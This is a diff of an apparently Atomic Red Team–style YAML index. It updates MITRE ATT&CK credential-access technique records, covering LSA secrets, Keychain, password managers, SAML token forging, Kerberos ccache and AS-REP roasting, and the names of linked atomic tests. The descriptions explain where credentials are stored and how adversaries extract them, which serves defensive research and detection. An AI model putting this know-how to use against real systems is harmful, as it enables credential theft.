+      id: attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3
+      created: '2020-02-12T18:55:24.728Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1555/001
+        external_id: T1555.001
+      - source_name: External to DA, the OS X Way
+        description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
+          DA, the OS X Way. Retrieved September 12, 2024.
+        url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
+      - source_name: Keychain Services Apple
+        description: Apple. (n.d.). Keychain Services. Retrieved April 11, 2022.
+        url: https://developer.apple.com/documentation/security/keychain_services
+      - source_name: Empire Keychain Decrypt
+        description: Empire. (2018, March 8). Empire keychaindump_decrypt Module.
+          Retrieved April 14, 2022.
+        url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py
+      - source_name: OSX Keychain Schaumann
+        description: Jan Schaumann. (2015, November 5). Using the OS X Keychain to
+          store and retrieve passwords. Retrieved March 31, 2022.
+        url: https://www.netmeister.org/blog/keychain-passwords.html
+      - source_name: Keychain Decryption Passware
+        description: Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption.
+          Retrieved April 13, 2022.
+        url: https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1555.001
     atomic_tests: []
   T1003.004:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Ed Williams, Trustwave, SpiderLabs
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc
-      type: attack-pattern
-      created: '2020-02-21T16:22:09.493Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1003.004
-        url: https://attack.mitre.org/techniques/T1003/004
-      - source_name: Passcape LSA Secrets
-        url: https://www.passcape.com/index.php?section=docsys&cmd=details&id=23
-        description: Passcape. (n.d.). Windows LSA secrets. Retrieved February 21,
-          2020.
-      - source_name: Microsoft AD Admin Tier Model
-        url: https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN
-        description: Microsoft. (2019, February 14). Active Directory administrative
-          tier model. Retrieved February 21, 2020.
-      - source_name: Tilbury Windows Credentials
-        url: https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf
-        description: 'Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack,
-          Mitigation, Defense. Retrieved February 21, 2020.'
-      - source_name: ired Dumping LSA Secrets
-        url: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets
-        description: Mantvydas Baranauskas. (2019, November 16). Dumping LSA Secrets.
-          Retrieved February 21, 2020.
-      - url: https://github.com/mattifestation/PowerSploit
-        description: PowerSploit. (n.d.). Retrieved December 4, 2014.
-        source_name: Powersploit
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-13T15:49:17.591Z'
       name: 'OS Credential Dumping: LSA Secrets'
       description: |-
         Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at <code>HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets</code>. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)
@@ -73792,6 +74408,9 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - Ed Williams, Trustwave, SpiderLabs
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor processes and command-line arguments for program
         execution that may be indicative of credential dumping. Remote access tools
         may contain built-in features or incorporate existing tools like Mimikatz.
@@ -73799,16 +74418,47 @@ credential-access:
         such as PowerSploit''s Invoke-Mimikatz module,(Citation: Powersploit) which
         may require additional logging features to be configured in the operating
         system to collect necessary information for analysis.'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Access'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc
+      created: '2020-02-21T16:22:09.493Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1003/004
+        external_id: T1003.004
+      - source_name: Tilbury Windows Credentials
+        description: 'Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack,
+          Mitigation, Defense. Retrieved February 21, 2020.'
+        url: https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf
+      - source_name: ired Dumping LSA Secrets
+        description: Mantvydas Baranauskas. (2019, November 16). Dumping LSA Secrets.
+          Retrieved February 21, 2020.
+        url: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets
+      - source_name: Microsoft AD Admin Tier Model
+        description: Microsoft. (2019, February 14). Active Directory administrative
+          tier model. Retrieved February 21, 2020.
+        url: https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN
+      - source_name: Passcape LSA Secrets
+        description: Passcape. (n.d.). Windows LSA secrets. Retrieved February 21,
+          2020.
+        url: https://www.passcape.com/index.php?section=docsys&cmd=details&id=23
+      - source_name: Powersploit
+        description: PowerSploit. (n.d.). Retrieved December 4, 2014.
+        url: https://github.com/mattifestation/PowerSploit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1003.004
     atomic_tests:
     - name: Dumping LSA Secrets
@@ -73859,17 +74509,18 @@ credential-access:
         elevation_required: true
   T1606.002:
     technique:
-      modified: '2024-03-01T17:55:56.116Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Forge Web Credentials: SAML token'
       description: |-
         An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.(Citation: Microsoft SolarWinds Steps) The default lifetime of a SAML token is one hour, but the validity period can be specified in the <code>NotOnOrAfter</code> value of the <code>conditions ...</code> element in a token. This value can be changed using the <code>AccessTokenLifetime</code> in a <code>LifetimeTokenPolicy</code>.(Citation: Microsoft SAML Token Lifetimes) Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.(Citation: Cyberark Golden SAML)
 
         An adversary may utilize [Private Keys](https://attack.mitre.org/techniques/T1552/004) to compromise an organization's token-signing certificate to create forged SAML tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing certificate.(Citation: Microsoft SolarWinds Customer Guidance) This differs from [Steal Application Access Token](https://attack.mitre.org/techniques/T1528) and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users.
 
-        An adversary may gain administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)
+        An adversary may gain administrative Entra ID privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Blake Strom, Microsoft 365 Defender
       - Oleg Kolesnikov, Securonix
@@ -73882,14 +74533,14 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
       - SaaS
       - Windows
-      - Office 365
-      - Google Workspace
       - IaaS
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Web Credential: Web Credential Usage'
       - 'Web Credential: Web Credential Creation'
@@ -73930,14 +74581,11 @@ credential-access:
         url: https://www.sygnia.co/golden-saml-advisory
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1606.002
     atomic_tests: []
   T1003.007:
     technique:
-      modified: '2024-04-10T16:41:01.496Z'
+      modified: '2024-10-15T15:13:32.253Z'
       name: 'OS Credential Dumping: Proc Filesystem'
       description: |-
         Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the `/proc/<PID>/maps` file shows how memory is mapped within the process’s virtual address space. And `/proc/<PID>/mem`, exposed for debugging purposes, provides access to the process’s virtual address space.(Citation: Picus Labs Proc cump 2022)(Citation: baeldung Linux proc map 2022)
@@ -74000,81 +74648,79 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.007
     atomic_tests: []
   T1555.005:
     technique:
+      modified: '2024-08-19T13:53:33.661Z'
+      name: Password Managers
+      description: |-
+        Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)
+
+        Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)
+         Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      x_mitre_contributors:
+      - Matt Burrough, @mattburrough, Microsoft
+      x_mitre_deprecated: false
+      x_mitre_detection: "Consider monitoring API calls, file read events, and processes
+        for suspicious activity that could indicate searching in process memory of
+        password managers. \n\nConsider monitoring file reads surrounding known password
+        manager applications."
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Matt Burrough, @mattburrough, Microsoft
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'Process: Process Access'
+      - 'Process: OS API Execution'
+      - 'File: File Access'
+      - 'Command: Command Execution'
       type: attack-pattern
+      id: attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21
       created: '2021-01-22T16:08:40.629Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1555.005
         url: https://attack.mitre.org/techniques/T1555/005
-      - source_name: ise Password Manager February 2019
-        url: https://www.ise.io/casestudies/password-manager-hacking/
-        description: 'ise. (2019, February 19). Password Managers: Under the Hood
-          of Secrets Management. Retrieved January 22, 2021.'
+        external_id: T1555.005
+      - source_name: Cyberreason Anchor December 2019
+        description: 'Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM
+          A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September
+          10, 2020.'
+        url: https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware
       - source_name: FoxIT Wocao December 2019
-        url: https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf
         description: 'Dantzig, M. v., Schamper, E. (2019, December 19). Operation
           Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved
           October 8, 2020.'
+        url: https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf
+      - source_name: ise Password Manager February 2019
+        description: 'ise. (2019, February 19). Password Managers: Under the Hood
+          of Secrets Management. Retrieved January 22, 2021.'
+        url: https://www.ise.io/casestudies/password-manager-hacking/
       - source_name: Github KeeThief
-        url: https://github.com/GhostPack/KeeThief
         description: Lee, C., Schoreder, W. (n.d.). KeeThief. Retrieved February 8,
           2021.
+        url: https://github.com/GhostPack/KeeThief
       - source_name: NVD CVE-2019-3610
-        url: https://nvd.nist.gov/vuln/detail/CVE-2019-3610
         description: National Vulnerability Database. (2019, October 9). CVE-2019-3610
           Detail. Retrieved April 14, 2021.
-      - source_name: Cyberreason Anchor December 2019
-        url: https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware
-        description: 'Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM
-          A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September
-          10, 2020.'
-      modified: '2022-05-11T14:00:00.188Z'
-      name: Password Managers
-      description: |-
-        Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)
-
-        Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)
-         Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: credential-access
-      x_mitre_detection: "Consider monitoring API calls, file read events, and processes
-        for suspicious activity that could indicate searching in process memory of
-        password managers. \n\nConsider monitoring file reads surrounding known password
-        manager applications."
-      x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
+        url: https://nvd.nist.gov/vuln/detail/CVE-2019-3610
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'Process: Process Access'
-      - 'Process: OS API Execution'
-      - 'File: File Access'
-      - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1040:
     technique:
-      modified: '2024-04-19T12:32:44.370Z'
+      modified: '2024-10-15T15:11:55.217Z'
       name: Network Sniffing
       description: |-
         Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
@@ -74159,7 +74805,6 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1040
     atomic_tests:
     - name: Packet Capture Windows Command Prompt
@@ -74279,7 +74924,7 @@ credential-access:
         elevation_required: true
   T1552.002:
     technique:
-      modified: '2023-07-28T18:29:56.525Z'
+      modified: '2024-10-15T16:26:46.873Z'
       name: 'Unsecured Credentials: Credentials in Registry'
       description: |-
         Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
@@ -74328,9 +74973,8 @@ credential-access:
         url: https://pentestlab.blog/2017/04/19/stored-credentials/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.002
     atomic_tests:
     - name: Enumeration for Credentials in Registry
@@ -74360,31 +75004,7 @@ credential-access:
         name: command_prompt
   T1556.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Vincent Le Toux
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
-      type: attack-pattern
-      created: '2020-02-11T19:05:45.829Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.002
-        url: https://attack.mitre.org/techniques/T1556/002
-      - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
-        description: Fuller, R. (2013, September 11). Stealing passwords every time
-          they change. Retrieved November 21, 2017.
-        source_name: Carnal Ownage Password Filters Sept 2013
-      - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
-        description: Bialek, J. (2013, September 15). Intercepting Password Changes
-          With Function Hooking. Retrieved November 21, 2017.
-        source_name: Clymb3r Function Hook Passwords Sept 2013
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T16:16:18.271Z'
       name: 'Modify Authentication Process: Password Filter DLL'
       description: "Adversaries may register malicious password filter dynamic link
         libraries (DLLs) into the authentication process to acquire user credentials
@@ -74408,22 +75028,44 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Vincent Le Toux
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages</code>) and correlate then investigate the DLL files these files reference.
 
         Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Creation'
       - 'Module: Module Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+      created: '2020-02-11T19:05:45.829Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/002
+        external_id: T1556.002
+      - source_name: Clymb3r Function Hook Passwords Sept 2013
+        description: Bialek, J. (2013, September 15). Intercepting Password Changes
+          With Function Hooking. Retrieved November 21, 2017.
+        url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+      - source_name: Carnal Ownage Password Filters Sept 2013
+        description: Fuller, R. (2013, September 11). Stealing passwords every time
+          they change. Retrieved November 21, 2017.
+        url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.002
     atomic_tests:
     - name: Install and Register Password Filter DLL
@@ -74519,58 +75161,89 @@ credential-access:
           remove-item C:\Windows\System32\#{dll_name}
         name: powershell
         elevation_required: true
-  T1558.004:
-    technique:
-      x_mitre_platforms:
-      - Windows
+  T1558.005:
+    technique:
+      modified: '2024-10-14T21:26:37.856Z'
+      name: Ccache Files
+      description: "\nAdversaries may attempt to steal Kerberos tickets stored in
+        credential cache files (or ccache). These files are used for short term storage
+        of a user's active session credentials. The ccache file is created upon user
+        authentication and allows for access to multiple services without the user
+        having to re-enter credentials. \n\nThe <code>/etc/krb5.conf</code> configuration
+        file and the <code>KRB5CCNAME</code> environment variable are used to set
+        the storage location for ccache entries. On Linux, credentials are typically
+        stored in the `/tmp` directory with a naming format of `krb5cc_%UID%` or `krb5.ccache`.
+        On macOS, ccache entries are stored by default in memory with an `API:{uuid}`
+        naming scheme. Typically, users interact with ticket storage using <code>kinit</code>,
+        which obtains a Ticket-Granting-Ticket (TGT) for the principal; <code>klist</code>,
+        which lists obtained tickets currently held in the credentials cache; and
+        other built-in binaries.(Citation: Kerberos GNU/Linux)(Citation: Binary Defense
+        Kerberos Linux)\n\nAdversaries can collect tickets from ccache files stored
+        on disk and authenticate as the current user without their password to perform
+        [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) attacks.
+        Adversaries can also use these tickets to impersonate legitimate users with
+        elevated privileges to perform [Privilege Escalation](https://attack.mitre.org/tactics/TA0004).
+        Tools like Kekeo can also be used by adversaries to convert ccache files to
+        Windows format for further [Lateral Movement](https://attack.mitre.org/tactics/TA0008).
+        On macOS, adversaries may use open-source tools or the Kerberos framework
+        to interact with ccache files and extract TGTs or Service Tickets via lower-level
+        APIs.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: Linux Kerberos
+        Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo) "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_contributors:
-      - Yossi Nisani, Cymptom
-      - James Dunn, @jamdunnDFW, EY
-      - Swapnil Kumbhar
-      - Jacques Pluviose, @Jacqueswildy_IT
-      - Dan Nutting, @KerberToast
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'File: File Access'
       type: attack-pattern
-      created: '2020-08-24T13:43:00.028Z'
+      id: attack-pattern--394220d9-8efc-4252-9040-664f7b115be6
+      created: '2024-09-17T15:02:31.324Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1558.004
-        url: https://attack.mitre.org/techniques/T1558/004
-      - source_name: Harmj0y Roasting AS-REPs Jan 2017
-        url: http://www.harmj0y.net/blog/activedirectory/roasting-as-reps/
-        description: HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved August
-          24, 2020.
-      - source_name: Microsoft Kerberos Preauth 2014
-        url: https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx
-        description: 'Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why
-          It Should Not Be Disabled. Retrieved August 25, 2020.'
-      - source_name: Stealthbits Cracking AS-REP Roasting Jun 2019
-        url: https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/
-        description: Jeff Warren. (2019, June 27). Cracking Active Directory Passwords
-          with AS-REP Roasting. Retrieved August 24, 2020.
-      - description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
-          Guard Dog of Hades. Retrieved March 22, 2018.
-        source_name: SANS Attacking Kerberos Nov 2014
-        url: https://redsiege.com/kerberoast-slides
-      - url: https://adsecurity.org/?p=2293
-        description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
-          Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
-          Domain. Retrieved March 22, 2018.
-        source_name: AdSecurity Cracking Kerberos Dec 2015
-      - url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
-        description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
-          using Azure Security Center. Retrieved March 23, 2018.
-        source_name: Microsoft Detecting Kerberoasting Feb 2018
-      - source_name: Microsoft 4768 TGT 2017
-        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768
-        description: 'Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication
-          ticket (TGT) was requested. Retrieved August 24, 2020.'
-      modified: '2021-06-07T19:23:33.039Z'
+        url: https://attack.mitre.org/techniques/T1558/005
+        external_id: T1558.005
+      - source_name: Binary Defense Kerberos Linux
+        description: " ARC Labs, Dwyer, John. Gonzalez, Eric. Hudak, Tyler. (2024,
+          October 1). Shining a Light in the Dark – How Binary Defense Uncovered an
+          APT Lurking in Shadows of IT. Retrieved October 7, 2024."
+        url: https://www.binarydefense.com/resources/blog/shining-a-light-in-the-dark-how-binary-defense-uncovered-an-apt-lurking-in-shadows-of-it/
+      - source_name: Kerberos GNU/Linux
+        description: Adepts of 0xCC. (2021, January 28). The Kerberos Credential Thievery
+          Compendium (GNU/Linux). Retrieved September 17, 2024.
+        url: https://adepts.of0x.cc/kerberos-thievery-linux/
+      - source_name: Kekeo
+        description: Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.
+        url: https://github.com/gentilkiwi/kekeo
+      - source_name: SpectorOps Bifrost Kerberos macOS 2019
+        description: Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost.
+          Retrieved October 6, 2021.
+        url: https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f
+      - source_name: Brining MimiKatz to Unix
+        description: Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing
+          Mimikatz et al to UNIX. Retrieved October 13, 2021.
+        url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
+      - source_name: Linux Kerberos Tickets
+        description: Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red
+          Teams. Retrieved October 4, 2021.
+        url: https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1558.004:
+    technique:
+      modified: '2024-10-15T15:32:07.850Z'
       name: 'Steal or Forge Kerberos Tickets: AS-REP Roasting'
       description: "Adversaries may reveal credentials of accounts that have disabled
         Kerberos preauthentication by [Password Cracking](https://attack.mitre.org/techniques/T1110/002)
@@ -74605,6 +75278,13 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - Yossi Nisani, Cymptom
+      - James Dunn, @jamdunnDFW, EY
+      - Swapnil Kumbhar
+      - Jacques Pluviose, @Jacqueswildy_IT
+      - Dan Nutting, @KerberToast
+      x_mitre_deprecated: false
       x_mitre_detection: 'Enable Audit Kerberos Service Ticket Operations to log Kerberos
         TGS service ticket requests. Particularly investigate irregular patterns of
         activity (ex: accounts making numerous requests, Event ID 4768 and 4769, within
@@ -74612,17 +75292,58 @@ credential-access:
         pre-authentication not required [Type: 0x0]).(Citation: AdSecurity Cracking
         Kerberos Dec 2015)(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation:
         Microsoft 4768 TGT 2017)'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
